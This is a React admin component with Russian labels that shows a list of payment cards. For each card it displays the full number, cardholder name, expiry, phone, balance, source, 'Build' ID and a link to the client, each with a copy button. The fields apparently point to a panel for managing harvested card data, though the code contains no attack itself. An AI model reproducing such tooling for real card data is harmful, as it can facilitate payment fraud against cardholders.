import CardProviderIcon from '@/components/card-provider-icon';
import { buildClientPath, buildClientRouteState } from '@/lib/client-navigation';
import type { ICardFillAdminCard } from '@/entities/card-fill-admin.entity';
import { formatCardSources, formatDateSource, formatDateTime } from '@/lib/card-fill-meta';
import { formatCardNumber, resolveCardProvider } from '@/lib/format-card';
import { cn } from '@/lib/utils';
import CardFillMetaRow from '@/pages/admin/card-fill/card-fill-meta-row';
import { Link, useLocation } from 'react-router';
import { toast } from 'sonner';

const money = new Intl.NumberFormat('en-US', { style: 'decimal', maximumFractionDigits: 0 });

function copyText(text: string) {
	void navigator.clipboard.writeText(text).then(
		() => toast.message('Скопировано'),
		() => toast.error('Не удалось скопировать'),
	);
}

function CardRow({ card }: { card: ICardFillAdminCard }) {
	const location = useLocation();
	const clientLinkState = buildClientRouteState(location.pathname, location.search);
	const provider = resolveCardProvider(card);
	const sourcesLabel = formatCardSources(card.sources);
	const dateSourceLabel = formatDateSource(card.dateSource);
	const hasBalance = card.balance != null;
	const sourceLine = [sourcesLabel, dateSourceLabel].filter(Boolean).join(' · ') || null;

	return (
		<div
			className={cn(
				'rounded-xl border border-border bg-card p-3 shadow-sm border-l-[3px] space-y-2.5',
				hasBalance ? 'border-l-chart-2' : 'border-l-muted-foreground/40',
			)}
		>
			<div className='flex items-start justify-between gap-2'>
				<div className='flex items-center gap-2 min-w-0'>
					<CardProviderIcon provider={provider} />
					<div className='min-w-0'>
						<p className='text-[10px] text-muted-foreground font-medium uppercase tracking-wide'>
							{provider ?? 'Карта'}
						</p>
						<button
							type='button'
							className='text-sm font-semibold font-mono break-all text-left hover:bg-accent/60 active:bg-accent rounded-xs px-0.5 -ml-0.5 cursor-pointer select-none'
							onClick={() => copyText(card.number)}
						>
							{formatCardNumber(card)}
						</button>
					</div>
				</div>
				{card.provider ? (
					<span className='text-xs shrink-0 rounded-full border border-border bg-muted/30 px-2 py-0.5'>
						{card.provider}
					</span>
				) : null}
			</div>

			<div className='grid gap-1.5 sm:grid-cols-2'>
				<CardFillMetaRow label='ФИО' value={card.owner} onCopy={copyText} copyValue={card.owner ?? ''} />
				<CardFillMetaRow label='Банк' value={card.bankName} />
				<CardFillMetaRow label='Срок' value={card.date} />
				<CardFillMetaRow label='Телефон' value={card.phoneNumber} onCopy={copyText} copyValue={card.phoneNumber ?? ''} />
				<CardFillMetaRow label='Маска' value={card.maskedNumber} />
				<CardFillMetaRow label='Источник' value={sourceLine} />
				<CardFillMetaRow label='Build' value={card.buildId} />
				<CardFillMetaRow
					label='Баланс'
					value={
						hasBalance
							? `${money.format(card.balance ?? 0)}${card.balanceDate ? ` · ${card.balanceDate}` : ''}`
							: null
					}
					onCopy={hasBalance ? copyText : undefined}
					copyValue={hasBalance ? String(card.balance) : undefined}
				/>
				<CardFillMetaRow label='Обогащено' value={card.enrichedAt ? formatDateTime(card.enrichedAt) : null} />
				<CardFillMetaRow label='Создана' value={formatDateTime(card.createdAt)} />
			</div>

			<div className='flex flex-wrap items-center gap-x-3 gap-y-1 text-xs text-muted-foreground'>
				<span>@{card.profileNickname}</span>
				<Link to={buildClientPath(card.clientId)} state={clientLinkState} className='text-chart-2 hover:underline'>
					Открыть клиента
				</Link>
			</div>
		</div>
	);
}

export default function CardFillCardsTable({
	cards,
	emptyText,
}: {
	cards: ICardFillAdminCard[];
	emptyText: string;
}) {
	if (cards.length === 0) {
		return <p className='text-sm text-muted-foreground rounded-xl border border-dashed p-4'>{emptyText}</p>;
	}

	return (
		<div className='space-y-2'>
			{cards.map(card => (
				<CardRow key={card.id} card={card} />
			))}
		</div>
	);
}
